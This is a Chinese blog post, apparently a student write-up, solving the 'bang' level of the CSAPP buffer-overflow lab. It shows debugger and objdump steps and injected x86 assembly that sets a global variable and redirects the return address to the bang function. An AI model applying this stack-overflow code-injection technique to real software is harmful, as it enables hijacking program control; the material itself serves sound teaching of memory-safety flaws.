CSAPP:bang

最新推荐文章于 2024-09-05 11:02:07 发布
最新推荐文章于 2024-09-05 11:02:07 发布
阅读量426 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42781851/article/details/89289175
版权

要修改global_val这个全局变量,应该通过一段程序来修改。将程序从buf的起始地址处开始,可以先将返回地址设为buf的起始地址,首先找到buf的起始地址0x55682f78设为第45-48个字节。然后开始运行自己写的程序,

找buf的起始地址可以通过edb来查找

cd ~/edb-debugger/build/
./edb --run ~/hitcs/320y/bufbomb -u xxx

执行到get函数处
在这里插入图片描述
发现把参数eax传给了gets函数,查看eax的地址0x55682f78即为buf起始地址。
在这里插入图片描述
用gdb查看global_value的地址。
在这里插入图片描述
bang的地址查看方法:

objdump -d bufbomb > asm.txt
gedit asm.txt

Ctrl+F搜索bang,就找到了bang的地址:0x08048c39

push %ebp
mov %esp,%ebp
mov $0x3d1ca510, %eax
mov %eax, 0x804e160;	把cookie赋值给 global_value 0x804e160是global_value的地址
mov $0x08048c39, %eax 
mov %eax,0x4(%ebp); 	%ebp(栈底指针)后面存的就是返回地址,我们将其改为bang的地址
leave
ret

我们模仿重新调用一个程序,这样%ebp的值不会改变,0x4(%ebp)即为返回地址,我们将其改为address的地址。同时修改全局变量的值,将cookie赋值给全局变量,然后 leave,ret调用bang函数。
然后把汇编转成二进制。

gcc -m32 -c asm.s
objdunp -d asm.o > asm.txt
与千寻L
关注
CSAPP实验之Data Lab:bang
一只巴扎黑的博客
11-19 812
编写函数bang,函数要求: bang - Compute !x without using ! Examples: bang(3) = 0, bang(0) = 1 Legal ops: ~ & ^ | + << >> Max ops: 12 Rating: 4 我来说一下我的思路. 首先,这个函数的关键在于当x=0时输出1,其余情况输出0. 因此我们唯一需要确定...
CSAPP: Buffer Lab
热门推荐
未选之路
07-05 1万+
深入理解计算机系统中的buffer lab
函数
bangzhuang1141的博客
09-13 147
C++函数相关 1.为什么使用函数? ①.通过使用函数,,可以将程序模块化,将程序设计的简单直观。 ②.通过将一些会被重复多次使用的代码写为函数,可以极大的减轻程序员的代码工作量,降低复杂性,避免重复代码。 ③.提高了程序的可读性和可维护性。 #include<iostream> usingnamespacestd; intmax(intnum1...
[学习笔记]《CSAPP》深入理解计算机系统 - Chapter 3 程序的机器级表示
最新发布
qq_39274501的博客
09-05 402
结构的所有组成部分都存放在内存中一段连续的区域内,而指向结构的指针就是结构第一个字节的地址。编译器维护关于每个结构类型的信息,指示每个字段。它以这些偏移作为内存引用指令中的位移,从而产生对结构元素的引用。
CSAPP的书评
redriver81的专栏
11-15 863
陆陆续续花了2个月的时间终于把这个久负盛名的CSAPP看完了,不愧为一本名副其实的经典书籍。有种相见恨晚的感觉,以至于从不会写书评的我也情不自禁的想说点什么。     这本书的书名叫”Computer Systems: A Programmer's Perspective",从程序员的角度去理解计算机系统,也暗示了书中讲的任何内容都会和程序员所做的事情联系起来。就这点看来,书的中文名取的不好。
csapp
12-03
深入理解计算机系统及实验
CSAPP:Lab3 bufbomb实验记录
俯瞰风景
05-04 961
ID:alucard Cookie:0x1b6069a4 Level 0: 要求getbuf()执行完后,跳到smoke()里面 080491f4:  80491f4:    55                      push   %ebp  80491f5:    89e5                   mov    %esp,%ebp  80491f7:    83e
CSAPP实验三:缓冲区溢出炸弹(Buflab)
CNFINITE的博客
08-12 8843
本系列文章为中国科学技术大学计算机专业学科基础课《计算机系统》布置的实验,上课所用教材和内容为黑书CSAPP,当时花费很大精力和弯路,现来总结下各个实验,本文章为第三个实验——缓冲区溢出炸弹(Buflab)。 一、实验名称:buflab 二、实验学时: 3 三、实验内容和目的: 掌握函数调用时的栈帧结构,利用输入缓冲区的溢出漏洞,将攻击代码嵌入当前程序的栈帧中,使得程序执行我们所期望的过程 四、实验原理: 溢出的字符将覆盖栈帧上的数据 特...
CSAPP Lab3: 缓冲区溢出攻击
东寻 的博客
10-24 3090
逆向工程【缓冲区溢出攻击】 任务描述 掌握函数调用时的栈帧结构,利用输入缓冲区的溢出漏洞,将攻击代码嵌入当前程序的栈帧中,使程序执行我们所期望的过程。 主要方法 溢出的字符将覆盖栈帧上的数据,会覆盖程序调用的返回地址,这赋予了我们控制程序流程的能力。通过构造溢出字符串,程序将“返回”至我们想要的代码上。 实验包括三个可执行文件: —| bufbomb为目标程序 —| makecookie可以生成...
CSAPP
07-04
不周山之读薄 CSAPP
csapp_深入理解计算机系统(第二版) _所有代码_csapp.h_csapp.c
11-06
深入理解计算机(第二版)书上的所有代码示例. 除了homework的代码. 示列代码都有. 包括 csapp.h csapp.c tiny web server等..
csapp Concurrent
fanjingdan的专栏
06-24 280
基于进程 Fork() Signal(SIGCHLD, sigchld_handler) 共享信息比thread少,浪费资源 基于IO Multiplexing 就是使用select操作fdset int select(int n, fd_set *fdset, NULL,NULL,NULL); fdset就是fd列表的bitmap,n是大小,有这些宏操作指令 FD_ZERO(fd_set *...
CSAPP:英文版计算机系统入门指南
《深入理解计算机系统:程序员视角》(英文版)是一本由Randal E. Bryant和David R. O'Hallaron编著的专业级计算机科学教材,适用于对计算机系统有初步了解并希望进一步提升英文能力的学习者。该书以编程者的角度...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值